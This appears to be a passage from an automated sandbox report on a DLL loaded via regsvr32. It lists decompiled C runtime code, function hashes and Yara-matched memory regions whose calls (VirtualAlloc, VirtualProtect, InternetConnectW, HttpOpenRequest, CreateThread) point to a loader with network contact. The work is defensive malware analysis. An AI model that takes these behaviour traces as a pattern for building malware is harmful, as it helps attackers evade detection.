                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: 0$9
                                • API String ID: 1967237116-1975997740
                                • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 23%
                                			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                				signed int _t213;
                                				signed char _t218;
                                				void* _t249;
                                				intOrPtr _t257;
                                				signed int _t331;
                                				signed int _t332;
                                				signed long long _t335;
                                				intOrPtr* _t354;
                                				intOrPtr* _t359;
                                				signed long long _t389;
                                
                                				_t331 = __rax;
                                				_a1220 = 0x27;
                                				_a72 = 0x10;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                				_a84 = 0x30;
                                				_a86 = _a1220 + 0x51;
                                				_a92 = 2;
                                				_a72 = 8;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                				asm("bts eax, 0x9");
                                				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                				E000007FE7FEF9D31EA0( &_a1560);
                                				_a1304 = _t331;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                				E000007FE7FEF9D31EA0( &_a1560);
                                				_a1304 = _t331;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t332;
                                				goto 0xf9d3e807;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t332;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t332;
                                				goto 0xf9d3e844;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t332;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                				if (_a1304 >= 0) goto 0xf9d3e87b;
                                				_a1312 =  ~_a1304;
                                				asm("bts eax, 0x8");
                                				goto 0xf9d3e88b;
                                				_t335 = _a1304;
                                				_a1312 = _t335;
                                				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                				_a1312 = _a1312 & _t335;
                                				if (_a116 >= 0) goto 0xf9d3e8d1;
                                				_a116 = 1;
                                				goto 0xf9d3e8ee;
                                				_a80 = _a80 & 0xfffffff7;
                                				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                				_a116 = 0x200;
                                				if (_a1312 != 0) goto 0xf9d3e901;
                                				_a92 = 0;
                                				_a64 =  &_a687;
                                				_t213 = _a116;
                                				_a116 = _a116 - 1;
                                				if (_t213 > 0) goto 0xf9d3e92f;
                                				if (_a1312 == 0) goto 0xf9d3e9cc;
                                				_a1480 = _a72;
                                				_a1296 = _t213 / _a1480 + 0x30;
                                				_a1488 = _a72;
                                				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                				_t218 = _a1296 + _a1220;
                                				_a1296 = _t218;
                                				 *_a64 = _a1296 & 0x000000ff;
                                				_a64 = _a64 - 1;
                                				goto 0xf9d3e90e;
                                				_a104 = _t218;
                                				_a64 = _a64 + 1;
                                				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                				if (_a104 == 0) goto 0xf9d3ea0b;
                                				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                				_a64 = _a64 - 1;
                                				 *_a64 = 0x30;
                                				_a104 = _a104 + 1;
                                				if (_a108 != 0) goto 0xf9d3ec7c;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                				_a84 = 0x2d;
                                				_a92 = 1;
                                				goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                				_a84 = 0x2b;
                                				_a92 = 1;
                                				goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                				_a84 = 0x20;
                                				_a92 = 1;
                                				_a1320 = _a88 - _a104 - _a92;
                                				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                				if (_a76 != 0) goto 0xf9d3ec29;
                                				if (_a104 <= 0) goto 0xf9d3ec29;
                                				_t354 = _a64;
                                				_a1328 = _t354;
                                				_a1336 = _a104;
                                				_a1336 = _a1336 - 1;
                                				if (_a1336 <= 0) goto 0xf9d3ec27;
                                				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                				_a1496 = _t354;
                                				E000007FE7FEF9D26840(_t249,  &_a120);
                                				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                				if (_a1340 > 0) goto 0xf9d3ebe7;
                                				_a1200 = 0xffffffff;
                                				goto 0xf9d3ec27;
                                				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                				_a1328 = _a1328 + _a1340;
                                				goto 0xf9d3eb61;
                                				goto 0xf9d3ec47;
                                				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                				if (_a1200 < 0) goto 0xf9d3ec7c;
                                				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                				if (_a96 == 0) goto 0xf9d3ec9c;
                                				0xf9d25330();
                                				_a96 = 0;
                                				goto 0xf9d3da75;
                                				if (_a1216 == 0) goto 0xf9d3ecc2;
                                				if (_a1216 == 7) goto 0xf9d3ecc2;
                                				_a1504 = 0;
                                				goto 0xf9d3eccd;
                                				_a1504 = 1;
                                				_t257 = _a1504;
                                				_a1344 = _t257;
                                				if (_a1344 != 0) goto 0xf9d3ed13;
                                				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                				_a32 = _t359;
                                				r9d = 0;
                                				r8d = 0x8f5;
                                				0xf9d2b3b0();
                                				if (_t257 != 1) goto 0xf9d3ed13;
                                				asm("int3");
                                				if (_a1344 != 0) goto 0xf9d3ed6f;
                                				0xf9d2ab30();
                                				 *_t359 = 0x16;
                                				_a32 = 0;
                                				r9d = 0x8f5;
                                				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                				_a1376 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_a120);
                                				goto 0xf9d3ed8e;
                                				_a1380 = _a1200;
                                				E000007FE7FEF9D26800( &_a120);
                                				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                			}














                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: '$9
                                • API String ID: 1967237116-1823400153
                                • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer
                                • String ID: 0*/$@'/
                                • API String ID: 3527080286-4269268540
                                • Opcode ID: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                • Instruction ID: b357231f8f0063d758982780f1c63af601305b6eea545ef6037656fa00afa9a2
                                • Opcode Fuzzy Hash: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                • Instruction Fuzzy Hash: 64411625A0AA4A92EBA09B19EC4537E23E0F785784FB15132D5CD077B5CF7EE8018745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                • API String ID: 2480363372-1749241151
                                • Opcode ID: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                • Instruction ID: 19170a7b4d801314c698f141b2cab39615b7a96e1dab02ace679e734dc17c016
                                • Opcode Fuzzy Hash: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                • Instruction Fuzzy Hash: BD113D7AA2868686EBE49B94D841B6D63E1F781795F605036E68E43BA4CB3DE404CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DestroyedExceptionFindFrameObjectUnlink
                                • String ID: csm
                                • API String ID: 1826589669-1018135373
                                • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_nolock
                                • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                • API String ID: 2882679554-3458198949
                                • Opcode ID: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                • Instruction ID: ad827b7ac8ab2a7eb82804d35ce3812f3a61bc9df3b9012bdfb51b84df9589d9
                                • Opcode Fuzzy Hash: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                • Instruction Fuzzy Hash: D6014431A1C78286EBD09B6AE88472EB3D0F390350F604535E6CD43FA8DBBED4058B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Execution Graph

                                Execution Coverage:17.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:4.4%
                                Total number of Nodes:90
                                Total number of Limit Nodes:12

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1218933398.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd
                                Similarity
                                • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                • API String ID: 2313188843-2517549848
                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction ID: f654c121e0f75809087bb2166a3c52b90b1e84719569e0c161f38774067afe60
                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction Fuzzy Hash: AD72B531618B48CBDB2DDF18C885BB9B7E1FBA8305F14462DE88AD7211DB34D946CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &$5RX$WE0$\h]
                                • API String ID: 0-3485045178
                                • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 47T]$K_j$is[
                                • API String ID: 0-2699472077
                                • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $g$>6$nB
                                • API String ID: 0-1868063892
                                • Opcode ID: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                • Opcode Fuzzy Hash: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 599 1800155e0-18001569d call 1800153f4 602 1800156a3-18001571f call 18001c224 599->602 603 180015725-180015765 InternetConnectW 599->603 602->603
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConnectInternet
                                • String ID: /w?$pYi
                                • API String ID: 3050416762-3829454487
                                • Opcode ID: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                • Instruction ID: 9ccfc4099f9371cda73c12f66118d6bd88d16b35f011f4316eea9315b8229921
                                • Opcode Fuzzy Hash: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                • Instruction Fuzzy Hash: B741E57050C7888FD778DF28D08579AB7E0FB98355F504A2EE88DC7256DB749844CB46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HttpOpenRequest
                                • String ID: /w?
                                • API String ID: 1984915467-2883141396
                                • Opcode ID: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                • Instruction ID: 62644a68fcffc2b577fce7b544f847534cb1236eece225f9d3186d00a7134b33
                                • Opcode Fuzzy Hash: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                • Instruction Fuzzy Hash: 82414B7051CB848BDBA4DF18D08979AB7E0FB98315F10495EE48CC7296DB789888CB87
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                • Opcode ID: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                • Instruction ID: a7a4fb0533c75889cab630729e0b0d9f2a38dc76e554bad22bb68829b1652ebe
                                • Opcode Fuzzy Hash: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                • Instruction Fuzzy Hash: AB412C705187808FEB78DF18D48A79AB7E1FB98305F104A5DE88DC7396CB789844CB46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                • Instruction ID: ac55bdb39f8b4cda225445b8a297a6fe4d60e7d5d7af93594b9ed55c6b81ea6e
                                • Opcode Fuzzy Hash: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                • Instruction Fuzzy Hash: B941047061C7848FC7A8DF18D08579AB7E0FB98304F10895EE88DC7256DB709988CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                • Instruction ID: 3f2c7be81e2b52442973c9c793e7ddf499cdb82d70e50cd1cb8991bbce4e9b94
                                • Opcode Fuzzy Hash: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                • Instruction Fuzzy Hash: 4F316970A1CB848FD768DF28D48A75AB7E0FB98304F100A1EF588C7252CB74D904CB86
                                Uniqueness

                                Uniqueness Score: -1.00%